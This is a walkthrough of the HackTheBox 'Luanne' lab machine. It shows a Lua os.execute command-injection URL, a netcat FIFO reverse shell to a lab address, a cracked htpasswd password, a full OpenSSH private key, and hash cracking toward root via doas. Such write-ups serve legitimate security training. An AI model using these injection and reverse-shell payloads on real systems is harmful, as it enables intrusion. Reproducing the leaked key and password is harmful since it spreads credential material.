HackTheBox “Luanne” Walkthrough
Luanne, an easy-level Unix “NetBSD” OS machine on HackTheBox, through the Supervisor Process Manager, exploiting a command injection vulnerability in a Lua-backed API on port 80. That granted me access to a localhost web server, where an SSH key awaited, propelling me to the second user level. Armed with doas privileges, I cracked a hashed password from a backup file using PGP, attaining root access.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:
Check port 80.
Launching a directory scan.
Let’s see what we have inside robots.txt.
Initiate a dirsearch on the directory labeled “weather” found within the Disallow section.
Have a look at /weather/forecast.
Upon analyzing the JSON response, it reveals an error message indicating a missing city. To resolve this, we’ve appended the city parameter to the URL with the value “list,” as suggested, to obtain the complete list of available cities.
Experimenting with URL parameters and values, we appended a quote and semicolon marks after “list” to observe the response, resulting in a Lua error. The silver lining: the error provided both a directory path and a valuable error message.
Having dissected the query by introducing a quote and semicolon, our attempts to provoke an injection attack led us to experimenting with various parameters. After several iterations, success was achieved through Remote Command Execution utilizing os.execute. Employing the closing sequence '), separating commands with ;, and concluding with a Lua comment -- effectively sealed off the insertion, eliciting the warning message.
http://10.10.10.218/weather/forecast?city=list;')os.execute("cat /etc/passwd")--
Encoding the command for remote shell execution:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f |/bin/sh -i 2>&1| nc 10.10.14.6 4343 >/tmp/f
Launch a listener.
We inject the URL-encoded reverse shell command:
Check our listener.
Upon executing the command, we swiftly acquired a shell on the target machine, allowing us to employ the ls command for clue discovery, ultimately unveiling the coveted .htpasswd file.
Let’s read htpasswd.
Discovered the hashed password for the user ‘webapi_user’:
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
Let’s crack it using john:
The encryption revealed an MD5 hash, deciphered as “iamthebest,” providing access to the webapi_user’s password. Now, let’s proceed with further target enumeration.
I attempted to explore the contents of those directories, but found no accessible information. Now, let’s examine the active processes.
The r.michaels user initiated a process running another instance of weather.lua on port 3001. Attempted access using curl to retrieve the local page at 3001.
Encountering a “No Authorization” error on the identical page as port 80, I attempted to log in as the “webapi_user.”
Successfully retrieving the site, I observed its identical appearance to the one on port 80. Exploring the possibility of accessing the home directory, given the process was running as indicated by the tilde (~) in URLs.
Let’s append a forward slash after the ~r.michaels directory.
We got a directory listing, let’s see if we can get ssh private key.
$ curl -u webapi_user:iamthebest localhost:3001/~r.michaels/id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2610 100 2610 0 0 424k 0 --:--:-- --:--:-- --:--:-- 424k
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----Let’s ssh into the target using the id_rsa key.
Let’s have a look around.
Upon discovering the backups directory, we located an encoded backup file named devel_backup-2020–09–16.tar.gz.enc. Utilizing the netpgp command, we decrypted the file, aiming to decompress the files within.
Decompress.
Let’s have a look at those directories.
Let’s check .htpasswd.
Let’t crack the hash found using John.
Leveraging the cracked hash, we employed the doas command to access su privileges.
And we have a root shell.
Cheers.
